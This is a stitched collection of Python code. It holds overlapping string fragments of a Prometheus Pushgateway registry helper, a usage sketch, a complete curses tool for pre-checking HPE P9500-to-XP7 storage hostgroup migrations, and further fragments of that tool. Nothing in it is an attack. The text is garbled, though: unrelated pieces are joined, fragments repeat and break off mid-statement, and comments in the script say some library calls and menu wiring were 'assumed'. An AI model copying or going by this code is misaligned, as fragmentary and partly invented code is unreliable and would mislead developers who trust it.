"= re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X)",
"CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry",
"= components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if",
"+ re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*',",
"not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return",
"job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in collector_registries.keys(): collector_registries[name].unregister(collector) del",
"list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service) if m",
"'')))) for service in pushgateway_services: m = service_name_pattern.match(service) if m is not None:",
"not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def",
"conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None: components =",
"apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$',",
"re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services",
"prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info",
"register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in collector_registries.keys():",
"'\" + service + \"' is not a valid Pushgateway.\") else: raise ValueError(\"Service",
"components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m",
"collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix,",
"= {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix)",
"apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern =",
"m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m =",
"pushgateways def get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir",
"+ service + \"' not found.\") return pushgateways def get_registry(name): if name not"
] |
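Usage sketch for the registry helpers above, assuming a Pushgateway is reachable on localhost:9091. The job name, metric, and gateway address are invented for illustration; only get_registry, register_collector, and unregister_collector come from the module itself, the rest is standard prometheus_client API.

# minimal sketch, not part of the module: exercise a job-scoped registry
from prometheus_client import Gauge, push_to_gateway

duration = Gauge('batch_import_duration_seconds',
                 'Duration of the last batch import run',
                 registry=None)   # keep the gauge out of the default REGISTRY

register_collector('batch_import', duration)   # lazily creates the job registry
duration.set(42.0)

# push the whole per-job registry in one call; gateway address is an assumption
push_to_gateway('localhost:9091', job='batch_import',
                registry=get_registry('batch_import'))

unregister_collector('batch_import', duration)  # drop the collector and its registry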
"""
####################################################################################################
HPE XP7 Migration, Precheck

DESCRIPTION : Precheck to examine hostgroup is ready for migration
AUTHOR      : <NAME>

Based on previous ODR framework
1.0 Initial version
1.1 Curses menu structure added
1.2 Add search term criteria
1.3 Add config file
2.0 Consistency check update
2.1 Add xpinfo file processing

CONFIG      : xpmig.ini
LOG         : xpmig_precheck.log
TODO        : add generate temporary horcm file and daemon to pairdisplay & check on status
####################################################################################################
"""
import curses
from curses import panel
import re
import logging
import logging.handlers
import copy
from ConfigParser import ConfigParser
import sys
import os
import os.path
import csv
import string
import xp7

####################################################################################################
### VARIABLES
####################################################################################################
linelen = 100

boxpair_dict = {}
serialnbr_dict = {}
instance_dict = {}
site_dict = {}
collectfile_dict = {}
box_dict = {}

####################################################################################################
### FUNCTIONS
####################################################################################################

####################################################################################################
### CLASSES
####################################################################################################
class Menu(object):

    def __init__(self,window,items,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()
        self.position = 0
        self.items = items
        self.items.append(("exit","exit"))

    def navigate(self,n):
        self.position += n
        if self.position < 0:
            self.position = 0
        elif self.position >= len(self.items):
            self.position = len(self.items) - 1

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        while True:
            self.window.refresh()
            curses.doupdate()
            for index,item in enumerate(self.items):
                if index == self.position:
                    mode = curses.A_STANDOUT
                else:
                    mode = curses.A_NORMAL
                # line = "{}: {}".format(index,item[0])
                line = "{}".format(item[0])
                if len(line) >= self.width:
                    line = line[:self.width-1]
                self.window.addstr(1+index,2,line,mode)
            key = self.window.getch()
            if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
                if self.position == len(self.items) - 1:
                    break
                else:
                    self.items[self.position][1]()
            elif key == curses.KEY_UP:
                self.navigate(-1)
            elif key == curses.KEY_DOWN:
                self.navigate(1)
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.doupdate()

class InputMenu(object):

    def __init__(self,window,text,upd_obj,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()
        self.text = text
        self.reply = ""
        self.update_object = upd_obj

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        line = "{}: ".format(self.text)
        if len(line) >= self.width:
            line = line[:self.width-1]
        self.window.addstr(1,2,line)
        curses.echo()
        self.window.refresh()
        curses.doupdate()
        self.reply = self.window.getstr()
        ### after we received the response ###
        self.update_object.set(self.reply)
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.noecho()
        curses.doupdate()

class Selection(object):

    def __init__(self,window,title,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.title = title
        self.selection = []

    def display(self):
        self.window.clear()
        line = "{}: {}".format(self.title, ",".join(["{}-{}".format(x[0],x[1]) for x in self.selection]))
        if len(line) >= self.width:
            line = line[:self.width-1]
        self.window.addstr(1,2,line)
        self.window.border()
        self.window.refresh()
        curses.doupdate()

    def add(self,item):
        current_set = set(self.selection)
        current_set.add(item)
        self.selection = list(sorted(current_set))
        self.display()

    def clear(self):
        del self.selection[:]
        self.display()

    def get(self):
        return self.selection

class Search(object):

    def __init__(self,window,title,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.title = title
        self.search_str = ""

    def display(self):
        self.window.clear()
        line = "{}: {}".format(self.title,self.search_str)
        if len(line) >= self.width:
            line = line[:self.width-1]
        self.window.addstr(1,2,line)
        self.window.border()
        self.window.refresh()
        curses.doupdate()

    def set(self,search_str):
        self.search_str = search_str
        self.display()

    def clear(self):
        self.search_str = ""
        self.display()

    def get(self):
        return self.search_str

class Consistent(object):

    def __init__(self,window,title,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.title = title
        self.consistent = []

    def display(self):
        self.window.clear()
        line = "{}: {}".format(self.title,",".join(["{}-{}".format(x[0],x[1]) for x in self.consistent]))
        if len(line) >= self.width:
            line = line[:self.width-1]
        self.window.addstr(1,2,line)
        self.window.border()
        self.window.refresh()
        curses.doupdate()

    def add(self,item):
        current_set = set(self.consistent)
        current_set.add(item)
        self.consistent = list(sorted(current_set))
        self.display()

    def clear(self):
        del self.consistent[:]
        self.display()

    def get(self):
        return self.consistent

class ShowSummaryMenu(object):

    def __init__(self,window,selection,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.selection = selection
        self.hostgroup_summary = []
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()
        self.display_list = []

    def navigate(self,n):
        if n < 0:
            if self.slice_start >= 1:
                self.slice_start += n
                if self.slice_start < 0:
                    self.slice_start = 0
                self.slice_end = self.slice_start + self.slice_len
        elif n > 0:
            if self.slice_end < len(self.display_list) - 1:
                self.slice_end += n
                if self.slice_end > len(self.display_list) - 1:
                    self.slice_end = len(self.display_list) - 1
                self.slice_start = self.slice_end - self.slice_len

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        ### fill the list to display ###
        self.display_list = []
        for box_name,hostgroup_name in self.selection.get():
            self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name))
        ### now we know what to display ###
        self.slice_start = 0
        self.slice_len = min(len(self.display_list),self.heigth-6)
        self.slice_end = self.slice_start + self.slice_len
        while True:
            self.window.clear()
            self.window.refresh()
            curses.doupdate()
            for index,item in enumerate(self.display_list):
                if len(item) >= self.width:
                    item = item[:self.width-1]
                if self.slice_start <= index <= self.slice_end:
                    self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)
            key = self.window.getch()
            if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
                break
            elif key == curses.KEY_UP:
                self.navigate(-1)
            elif key == curses.KEY_DOWN:
                self.navigate(1)
            elif key == curses.KEY_PPAGE:
                self.navigate(-10)
            elif key == curses.KEY_NPAGE:
                self.navigate(10)
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.doupdate()

class ShowConsistencyMenu(object):

    def __init__(self,window,selection,consistent,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.selection = selection
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()
        self.display_list = []
        self.consistent = consistent

    def navigate(self,n):
        if n < 0:
            if self.slice_start >= 1:
                self.slice_start += n
                if self.slice_start < 0:
                    self.slice_start = 0
                self.slice_end = self.slice_start + self.slice_len
        elif n > 0:
            if self.slice_end < len(self.display_list) - 1:
                self.slice_end += n
                if self.slice_end > len(self.display_list) - 1:
                    self.slice_end = len(self.display_list) - 1
                self.slice_start = self.slice_end - self.slice_len

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        ### fill the list to display ###
        self.display_list = []
        for box_name,hostgroup_name in self.selection.get():
            if box_dict[box_name].test_hostgroup_exists(hostgroup_name):
                ### TODO: add CA check ###
                result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name)
                self.display_list.extend(report)
                if result:
                    self.consistent.add((box_name,hostgroup_name))
                    logger.info("{}-{} added to consistent hostgroup list during consistency check".format(box_name,hostgroup_name))
                else:
                    logger.error("{}-{} not added to consistent hostgroup list during consistency check".format(box_name,hostgroup_name))
            else:
                logger.debug("{}-{} does not exists".format(box_name,hostgroup_name))
        ### now we know what to display ###
        self.slice_start = 0
        self.slice_len = min(len(self.display_list),self.heigth-6)
        self.slice_end = self.slice_start + self.slice_len
        while True:
            self.window.clear()
            self.window.refresh()
            curses.doupdate()
            for index,item in enumerate(self.display_list):
                if len(item) >= self.width:
                    item = item[:self.width-1]
                if self.slice_start <= index <= self.slice_end:
                    self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)
            key = self.window.getch()
            if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
                break
            elif key == curses.KEY_UP:
                self.navigate(-1)
            elif key == curses.KEY_DOWN:
                self.navigate(1)
            elif key == curses.KEY_PPAGE:
                self.navigate(-10)
            elif key == curses.KEY_NPAGE:
                self.navigate(10)
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.doupdate()

class ShowWriteProvisionMenu(object):

    def __init__(self,window,consistent,map_dir,stdscr):
        self.window = window
        self.consistent = consistent
        self.map_dir = map_dir
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        self.window.addstr(1,2,"Write provisioning output file for the consistent HOSTGROUPs ? (Y/n)")
        key = self.window.getch()
        if key in [curses.KEY_ENTER,ord("\n"),ord("Y"),ord("y")]:
            ### write out the ldevs ###
            for box_name,hostgroup_name in self.consistent.get():
                if box_dict[box_name].test_hostgroup_exists(hostgroup_name):
                    sf = os.path.join(self.map_dir,"{}_{}.prov".format(box_name,hostgroup_name))
                    with open(sf,"wt") as sfh:
                        box_dict[box_name].print_provisioning(hostgroup_name,sfh)
            self.window.addstr(2,2,"Written..")
        else:
            self.window.addstr(2,2,"Cancelled..")
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.doupdate()

class Select_Menu(object):

    def __init__(self,window,items,selection,search,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        ### items is a dict ###
        self.items = items
        self.filtered_items = copy.copy(self.items.keys())
        self.filtered_items.append("exit")
        ### slice is a view on the items which fits in the window ###
        self.slice_start = 0
        self.slice_len = min(len(self.filtered_items)-1,self.heigth-6)
        self.slice_end = self.slice_start + self.slice_len
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()
        self.position = 0
        self.selection = selection
        self.search = search

    def update(self):
        """
        update the selection items list to match the new search criteria
        """
        if self.search.get() != "":
            logger.debug("Select_Menu.update :: update items to match search {}".format(self.search.get()))
            self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)]
        else:
            logger.debug("Select_Menu.update :: update items to match search all")
            self.filtered_items = copy.copy(self.items.keys())
        self.filtered_items.append("exit")
        self.slice_start = 0
        self.slice_end = self.slice_start + self.slice_len

    def navigate(self,n):
        self.position += n
        if self.position < 0:
            self.position = 0
        elif self.position >= len(self.filtered_items):
            self.position = len(self.filtered_items) - 1
        logger.debug("Select_Menu.navigate :: position = {}, n = {}".format(self.position,n))
        ### adjust slice ###
        if n < 0:
            if self.position - self.slice_start < 2 and self.slice_start >= 1:
                ### slide slice up ###
                self.slice_start += n
                if self.slice_start < 0:
                    self.slice_start = 0
                self.slice_end = self.slice_start + self.slice_len
                logger.debug("Select_Menu.navigate :: slide slice up to {}-{}".format(self.slice_start,self.slice_end))
        elif n > 0:
            if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1:
                ### slide slice down ###
                self.slice_end += n
                if self.slice_end > len(self.filtered_items) - 1:
                    self.slice_end = len(self.filtered_items) - 1
                self.slice_start = self.slice_end - self.slice_len
                logger.debug("Select_Menu.navigate :: slide slice down to {}-{}".format(self.slice_start,self.slice_end))

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        self.update()
        while True:
            self.window.clear()
            self.window.refresh()
            curses.doupdate()
            for index,item in enumerate(self.filtered_items):
                if index == self.position:
                    mode = curses.A_STANDOUT
                else:
                    mode = curses.A_NORMAL
                # line = "{}: {}".format(index,item)
                line = "{}".format(item)
                if len(line) >= self.width:
                    line = line[:self.width-1]
                logger.debug("Select_Menu.display :: line {}".format(line))
                if self.slice_start <= index <= self.slice_end:
                    # logger.debug("SelectMenu.display :: index in slice {} - {}, executing addstr".format(self.slice_start,self.slice_end))
                    self.window.addstr(1+(index-self.slice_start),2,line,mode)
            key = self.window.getch()
            if key in [ord("b"),ord("B")]:
                break
            elif key in [curses.KEY_ENTER,ord("\n")]:
                if self.position == len(self.filtered_items) - 1:
                    break
                else:
                    # self.items = {"select_str":[(boxpair_name,hostgroup_name),...]}
                    # self.selection.add(self.items[self.filtered_items[self.position]])
                    for add_item in self.items[self.filtered_items[self.position]]:
                        self.selection.add(add_item)
            elif key == curses.KEY_UP:
                self.navigate(-1)
            elif key == curses.KEY_DOWN:
                self.navigate(1)
            elif key == curses.KEY_PPAGE:
                self.navigate(-10)
            elif key == curses.KEY_NPAGE:
                self.navigate(10)
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.doupdate()

class Select_XPinfo(object):

    def __init__(self,window,selection,xpinfo_dir,stdscr):
        self.window = window
        self.heigth,self.width = self.window.getmaxyx()
        self.xpinfo_file_list = []
        self.slice_start = 0
        self.slice_len = 0
        self.slice_end = 0
        self.window.keypad(1)
        self.panel = panel.new_panel(self.window)
        self.panel.hide()
        panel.update_panels()
        self.position = 0
        self.xpinfo_dir = xpinfo_dir
        self.selection = selection

    def update(self):
        """
        update the list of xpinfo files present
        """
        if os.path.exists(self.xpinfo_dir):
            del(self.xpinfo_file_list[:])
            self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile("{}/{}".format(self.xpinfo_dir,f)) and re.match(".+\.xpinfo$",f,flags=re.IGNORECASE)]
            self.xpinfo_file_list.append("exit")
            self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6)
            self.slice_start = 0
            self.slice_end = self.slice_start + self.slice_len
            self.position = 0

    def navigate(self,n):
        self.position += n
        if self.position < 0:
            self.position = 0
        elif self.position >= len(self.xpinfo_file_list):
            self.position = len(self.xpinfo_file_list) - 1
        ### adjust slice ###
        if n < 0:
            if self.position - self.slice_start < 2 and self.slice_start >= 1:
                ### slide slice up ###
                self.slice_start += n
                if self.slice_start < 0:
                    self.slice_start = 0
                self.slice_end = self.slice_start + self.slice_len
        elif n > 0:
            if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1:
                ### slide slice down ###
                self.slice_end += n
                if self.slice_end > len(self.xpinfo_file_list) - 1:
                    self.slice_end = len(self.xpinfo_file_list) - 1
                self.slice_start = self.slice_end - self.slice_len

    def display(self):
        self.panel.top()
        self.panel.show()
        self.window.clear()
        self.update()
        while True:
            self.window.clear()
            self.window.refresh()
            curses.doupdate()
            ### show the list of xpinfo files ###
            for index,item in enumerate(self.xpinfo_file_list):
                if index == self.position:
                    mode = curses.A_STANDOUT
                else:
                    mode = curses.A_NORMAL
                # line = "{}: {}".format(index,item)
                line = "{}".format(item)
                if len(line) >= self.width:
                    line = line[:self.width-1]
                ### only add lines in the slice ###
                if self.slice_start <= index <= self.slice_end:
                    self.window.addstr(1+(index-self.slice_start),2,line,mode)
            key = self.window.getch()
            if key in [ord("b"),ord("B")]:
                break
            elif key in [curses.KEY_ENTER,ord("\n")]:
                if self.position == len(self.xpinfo_file_list) - 1:
                    break
                else:
                    logger.debug("XPINFO: start processing {}".format(self.xpinfo_file_list[self.position]))
                    serial_nbr_set = set(serialnbr_dict.values())
                    ldev_dict = {}
                    hostgroup_dict = {}
                    for serial_nbr in serial_nbr_set:
                        ldev_dict[serial_nbr] = set()
                    ### process the selected xpinfo file ###
                    with open("{}/{}".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),"rt") as f:
                        xpinfo_file_reader = csv.reader(f,delimiter=",",quotechar="'")
                        for row in xpinfo_file_reader:
                            if len(row) > 8:
                                hostname = row[0]
                                device_name = row[1]
                                ldev_nbr = xp7.standard_format_ldev(row[5])
                                serial_nbr = int(row[8])
                                logger.debug("XPINFO: got S/N {} LDEV {} from xpinfo file".format(serial_nbr,ldev_nbr))
                                if serial_nbr in ldev_dict:
                                    ldev_dict[serial_nbr].add(ldev_nbr)
                                    logger.debug("XPINFO: known S/N, added to ldev_dict, now at {} elements".format(len(ldev_dict[serial_nbr])))
                            else:
                                logger.error("XPINFO: line too short to be valid, skipping {}".format(row))
                    ### translate ldev to hostgroup ###
                    for serial_nbr in ldev_dict:
                        box_name = serial_to_name_dict[serial_nbr]
                        if not box_name in hostgroup_dict:
                            hostgroup_dict[box_name] = set()
                        for ldev_nbr in ldev_dict[serial_nbr]:
                            ### resolve each ldev to its hostgroup(s); the exact xp7 lookup call is assumed here ###
                            hostgroup_dict[box_name].update(box_dict[box_name].get_hostgroups_by_ldev(ldev_nbr))
                    ### add the hostgroups to the selection ###
                    for box_name in hostgroup_dict:
                        for hostgroup_name in hostgroup_dict[box_name]:
                            logger.debug("XPINFO processing: {}-{}".format(box_name,hostgroup_name))
                            self.selection.add((box_name,hostgroup_name))
            elif key == curses.KEY_UP:
                self.navigate(-1)
            elif key == curses.KEY_DOWN:
                self.navigate(1)
            elif key == curses.KEY_PPAGE:
                self.navigate(-10)
            elif key == curses.KEY_NPAGE:
                self.navigate(10)
        self.window.clear()
        self.panel.hide()
        panel.update_panels()
        curses.doupdate()

####################################################################################################
### MAIN
####################################################################################################
def main(stdscr):
    ### clear screen ###
    stdscr.clear()
    ### check window heigth and width ###
    if curses.COLS < 20 or curses.LINES < 20:
        sys.stderr.write("Window not big enough, exiting ..\n")
        sys.exit(1)
    ### define title_win ###
    title_win = stdscr.subwin(3,curses.COLS,0,0)
    title_win.addstr(1,2,"HPE P9500 TO XP7 MIGRATION PRE-CHECK")
    title_win.border()
    ### define search_win ###
    search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0)
    search = Search(search_win,"SEARCH expression",stdscr)
    search.display()
    ### define selection_win ###
    select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0)
    selection = Selection(select_win,"SELECTED HOSTGROUP(s)",stdscr)
    selection.display()
    ### define consistent_win ###
    consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0)
    consistent = Consistent(consistent_win,"CONSISTENT HOSTGROUP(s)",stdscr)
    consistent.display()
    ### define key_win ###
    key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0)
    #key_win.clear()
    #key_win.refresh()
    #curses.doupdate()
    key_win.addstr(0,2,"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK",curses.A_BOLD)
    ### define menu_win ###
    menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0)
    # menu_win.border()
    main_menu_items = []
    input_search = InputMenu(menu_win,"Specify new search string",search,stdscr)
    main_menu_items.append(("Set SEARCH string",input_search.display))
    main_menu_items.append(("Clear SEARCH string",search.clear))
    ### select hostgroups by box ###
    for boxpair_name in sorted(boxpair_dict.keys()):
        select_item_dict = {}
        for box_name in boxpair_dict[boxpair_name]:
            hostgroup_name_list = box_dict[box_name].get_hostgroups()
            for hostgroup_name in hostgroup_name_list:
                if hostgroup_name not in select_item_dict:
                    select_item_dict[hostgroup_name] = set()
                select_item_dict[hostgroup_name].add((box_name,hostgroup_name))
        hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
        main_menu_items.append(("Select {} HOSTGROUP".format(boxpair_name),hg_by_box_menu.display))
    ### select hostgroups by host (hba_wwn) ###
    select_item_dict = {}
    for boxpair_name in sorted(boxpair_dict.keys()):
        for box_name in boxpair_dict[boxpair_name]:
            hostgroup_name_list = box_dict[box_name].get_hostgroups()
            for hostgroup_name in hostgroup_name_list:
                hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name)
                for hba_wwn in hba_wwn_list:
                    if len(hba_wwn.nickname.split("_")) > 1:
                        sel_item = hba_wwn.nickname.split("_")[0]
                    else:
                        sel_item = hba_wwn.nickname
                    if "{}-{}".format(box_name,sel_item) not in select_item_dict:
                        select_item_dict["{}-{}".format(box_name,sel_item)] = set()
                    select_item_dict["{}-{}".format(box_name,sel_item)].add((box_name,hostgroup_name))
    # the by-host menu wiring below is assumed; only the dict build above is certain
    hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
    main_menu_items.append(("Select by HOST",hg_by_host_menu.display))
    ### select hostgroups by name ###
    select_item_dict = {}
    for boxpair_name in sorted(boxpair_dict.keys()):
        for box_name in boxpair_dict[boxpair_name]:
            hostgroup_name_list = box_dict[box_name].get_hostgroups()
            for hostgroup_name in hostgroup_name_list:
                if hostgroup_name not in select_item_dict:
                    select_item_dict[hostgroup_name] = set()
                select_item_dict[hostgroup_name].add((box_name,hostgroup_name))
    hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
    main_menu_items.append(("Select by HOSTGROUP",hg_by_name_menu.display))
    ### read XPINFO file ###
    xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr)
    main_menu_items.append(("Read XPINFO file",xpinfo_menu.display))
    ### show hostgroup summary menu ###
    hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr)
    main_menu_items.append(("Show HOSTGROUPs summary",hostgroup_summary.display))
    ### show hostgroup consistency menu ###
    hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr)
    main_menu_items.append(("Show HOSTGROUPs consistency check results",hostgroup_consistency.display))
    main_menu_items.append(("Clear HOSTGROUP selection",selection.clear))
    main_menu_items.append(("Clear consistent HOSTGROUP",consistent.clear))
    write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr)
    main_menu_items.append(("Write PROVISION file",write_prov.display))
    main_menu = Menu(menu_win,main_menu_items,stdscr)
    main_menu.display()
    ### refresh & wait ###
    stdscr.refresh()
    stdscr.getkey()

####################
### parse config ###
####################
configfile = "xpmig.ini"
cfg = ConfigParser()
cfg.read(configfile)
for mandatory_section in ("boxpair","serialnbr","instance","site","collect","dir"):
    if not cfg.has_section(mandatory_section):
        sys.stderr.write("{} section missing in config file {}, exiting..\n".format(mandatory_section,configfile))
        sys.exit(1)
for name,value in cfg.items("boxpair"):
    boxpair_dict[name.upper()] = value.split(",")
for name,value in cfg.items("serialnbr"):
    serialnbr_dict[name.upper()] = int(value)
for name,value in cfg.items("instance"):
    instance_dict[name.upper()] = int(value)
for name,value in cfg.items("site"):
    site_dict[name.upper()] = value
for name,value in cfg.items("collect"):
    collectfile_dict[name.upper()] = value
try:
    log_level = cfg.getint("log","level")
except:
    log_level = 30
try:
    log_size = cfg.getint("log","maxsize")
except:
    log_size = 100000000
try:
    log_versions = cfg.getint("log","maxversions")
except:
    log_versions = 5
try:
    log_dir = cfg.get("dir","log")
except:
    sys.stderr.write("log file dir not defined, exiting..\n")
    sys.exit(1)
try:
    xpinfo_dir = cfg.get("dir","xpinfo")
except:
    sys.stderr.write("xpinfo file dir not defined, exiting..\n")
    sys.exit(1)
try:
    collect_dir = cfg.get("dir","collect")
except:
    sys.stderr.write("collect file dir not defined, exiting..\n")
    sys.exit(1)
try:
    map_dir = cfg.get("dir","map")
except:
    sys.stderr.write("map file dir not defined, exiting..\n")
    sys.exit(1)
serial_to_name_dict = {}
for box_name,serial_nbr in serialnbr_dict.items():
    serial_to_name_dict[serial_nbr] = box_name

#####################
### start logging ###
#####################
logfile = os.path.join(log_dir,"xpmig_precheck.log")
logger = logging.getLogger("xpmig_precheck")
logger.setLevel(log_level)
fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s","%Y/%m/%d-%H:%M:%S")
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info("#" * linelen)
logger.info("XPMIG PRECHECK started")
logger.info("#" * linelen)
logger.info("Configuration:")
logger.info("XPINFO dir: {}".format(xpinfo_dir))

#########################
### instantiate boxes ###
#########################
for box_name in collectfile_dict:
    collect_file = os.path.join(collect_dir,collectfile_dict[box_name])
    if box_name in instance_dict:
        instance_nbr = instance_dict[box_name]
    else:
        err_msg = "No instance nbr defined for box {}, exiting..".format(box_name)
        logger.error(err_msg)
        sys.stderr.write(err_msg + "\n")
        sys.exit(1)
    if box_name in serialnbr_dict:
        serial_nbr = serialnbr_dict[box_name]
    else:
        err_msg = "No serial nbr defined for box {}, exiting..".format(box_name)
        logger.error(err_msg)
        sys.stderr.write(err_msg + "\n")
        sys.exit(1)
    if box_name in site_dict:
        site = site_dict[box_name]
    else:
        err_msg = "No site defined for box {}, exiting..".format(box_name)
        logger.error(err_msg)
        sys.stderr.write(err_msg + "\n")
        sys.exit(1)
    box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file)
    logger.info("XP7 object created for box {} :".format(box_name))
    logger.info(box_dict[box_name])

#####################
### start menu ###
#####################
curses.wrapper(main)
"= window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self):",
"else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line =",
"+ \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg =",
"Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a",
"line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border()",
"status #################################################################################################### \"\"\" import curses from curses import panel import re import logging",
"processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif",
"? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the",
"= int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr",
"self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent",
"consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top()",
